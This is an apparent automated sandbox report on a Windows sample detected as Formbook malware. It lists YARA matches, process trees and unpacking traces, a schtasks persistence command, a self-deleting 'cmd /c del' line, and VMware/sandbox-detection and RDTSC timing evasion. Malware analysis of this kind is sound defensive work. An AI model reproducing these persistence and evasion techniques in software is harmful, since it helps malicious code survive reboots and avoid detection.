            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F525DD
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB2581
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F51D55
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E80D20
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F52D07
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_00708C60
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_0071CC13
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_00702D90
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_0071C603
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_00702FB0
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\zLIpEDZOH.exe 2ABB16D594F4B36FC8B8AAB8CAB7736350421C619CEC8E12E8975E87F7A99FAA
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 02E8B150 appears 72 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 056BB150 appears 69 times
            Source: JAAkR51fQY.exeBinary or memory string: OriginalFilename vs JAAkR51fQY.exe
            Source: JAAkR51fQY.exe, 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs JAAkR51fQY.exe
            Source: JAAkR51fQY.exe, 00000000.00000000.201623771.00000000007D8000.00000002.00020000.sdmpBinary or memory string: OriginalFilename7 vs JAAkR51fQY.exe
            Source: JAAkR51fQY.exe, 00000000.00000002.241594476.0000000009BC0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs JAAkR51fQY.exe
            Source: JAAkR51fQY.exe, 00000000.00000002.239638081.0000000009810000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs JAAkR51fQY.exe
            Source: JAAkR51fQY.exe, 00000000.00000002.228113773.0000000000EDA000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs JAAkR51fQY.exe
            Source: JAAkR51fQY.exeBinary or memory string: OriginalFilename7 vs JAAkR51fQY.exe
            Source: JAAkR51fQY.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: JAAkR51fQY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: zLIpEDZOH.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.evad.winEXE@12/3@20/11
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeFile created: C:\Users\user\AppData\Roaming\zLIpEDZOH.exeJump to behavior
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeMutant created: \Sessions\1\BaseNamedObjects\ClgKynUFvXeJiYbLYFNDwWt
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_01
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeFile created: C:\Users\user\AppData\Local\Temp\tmp8416.tmpJump to behavior
            Source: JAAkR51fQY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: JAAkR51fQY.exeVirustotal: Detection: 31%
            Source: JAAkR51fQY.exeReversingLabs: Detection: 31%
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeFile read: C:\Users\user\Desktop\JAAkR51fQY.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\JAAkR51fQY.exe 'C:\Users\user\Desktop\JAAkR51fQY.exe'
            Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zLIpEDZOH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8416.tmp'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
            Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zLIpEDZOH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8416.tmp'
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
            Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: JAAkR51fQY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: JAAkR51fQY.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: JAAkR51fQY.exeStatic file information: File size 1068544 > 1048576
            Source: JAAkR51fQY.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x104200
            Source: JAAkR51fQY.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000004.00000002.269880810.00000000057AF000.00000040.00000001.sdmp, wlanext.exe, 0000000A.00000002.587511214.0000000002E60000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, wlanext.exe
            Source: Binary string: wlanext.pdb source: vbc.exe, 00000004.00000002.269706677.0000000005660000.00000040.00000001.sdmp
            Source: Binary string: vbc.pdb source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmp
            Source: Binary string: wlanext.pdbGCTL source: vbc.exe, 00000004.00000002.269706677.0000000005660000.00000040.00000001.sdmp

            Data Obfuscation:

            barindex
            Detected unpacking (changes PE section rights)Show sources
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeUnpacked PE file: 0.2.JAAkR51fQY.exe.6d0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeUnpacked PE file: 0.2.JAAkR51fQY.exe.6d0000.0.unpack
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_006D23F3 push edx; retf
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_006D268B pushfd ; retf
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_01127A87 pushad ; ret
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_07927492 push ecx; iretd
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_07923C50 push esp; iretd
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_0792744E push ecx; iretd
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_09C42893 push ecx; retf
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_0A3B1AFA push cs; iretd
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_0A3B0B47 push ds; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041508E push ebp; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041C9C8 push dword ptr [ECF9F4C6h]; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0040C2CA push ds; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0040C31A push ds; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004153DF pushad ; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041B3B5 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041B46C push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041B402 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041B40B push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00414DDA pushfd ; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0040EEAA push esp; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0570D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EDD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_0071508E push ebp; iretd
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_0071C9C8 push dword ptr [ECF9F4C6h]; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_0070C2CA push ds; retf
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_0070C31A push ds; retf
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_007153DF pushad ; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_0071B3B5 push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_0071B46C push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_0071B402 push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_0071B40B push eax; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.4388891588
            Source: initial sampleStatic PE information: section name: .text entropy: 7.4388891588
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeFile created: C:\Users\user\AppData\Roaming\zLIpEDZOH.exeJump to dropped file

            Boot Survival:

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zLIpEDZOH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8416.tmp'
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM_3Show sources
            Source: Yara matchFile source: 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: JAAkR51fQY.exe PID: 2204, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: JAAkR51fQY.exe, 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: JAAkR51fQY.exe, 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000007085E4 second address: 00000000007085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 000000000070897E second address: 0000000000708984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004088B0 rdtsc
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\JAAkR51fQY.exe TID: 2648Thread sleep time: -31500s >= -30000s
            Source: C:\Users\user\Desktop\JAAkR51fQY.exe TID: 3440Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6864Thread sleep time: -90000s >= -30000s
            Source: C:\Windows\SysWOW64\wlanext.exe TID: 6688Thread sleep count: 36 > 30
            Source: C:\Windows\SysWOW64\wlanext.exe TID: 6688Thread sleep time: -72000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: JAAkR51fQY.exe, 00000000.00000002.228844270.0000000002BF2000.00000004.00000001.sdmpBinary or memory string: VMware
            Source: explorer.exe, 00000005.00000000.252731868.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000005.00000000.251879257.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 00000005.00000003.549508247.0000000008907000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: JAAkR51fQY.exe, 00000000.00000002.228844270.0000000002BF2000.00000004.00000001.sdmpBinary or memory string: VMWARE
            Source: explorer.exe, 00000005.00000000.252731868.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000005.00000002.600579522.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
            Source: JAAkR51fQY.exe, 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000005.00000000.251879257.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: JAAkR51fQY.exe, 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: JAAkR51fQY.exe, 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: JAAkR51fQY.exe, 00000000.00000002.228844270.0000000002BF2000.00000004.00000001.sdmpBinary or memory string: VMware
            Source: JAAkR51fQY.exe, 00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: explorer.exe, 00000005.00000003.549031834.000000000F6AB000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: explorer.exe, 00000005.00000000.252731868.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
            Source: explorer.exe, 00000005.00000000.252481535.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: JAAkR51fQY.exe, 00000000.00000002.228844270.0000000002BF2000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: JAAkR51fQY.exe, 00000000.00000002.228844270.0000000002BF2000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000005.00000000.257657621.000000000F640000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&C
            Source: explorer.exe, 00000005.00000000.244973006.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
            Source: explorer.exe, 00000005.00000000.252731868.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
            Source: explorer.exe, 00000005.00000000.252868159.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
            Source: explorer.exe, 00000005.00000000.251879257.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
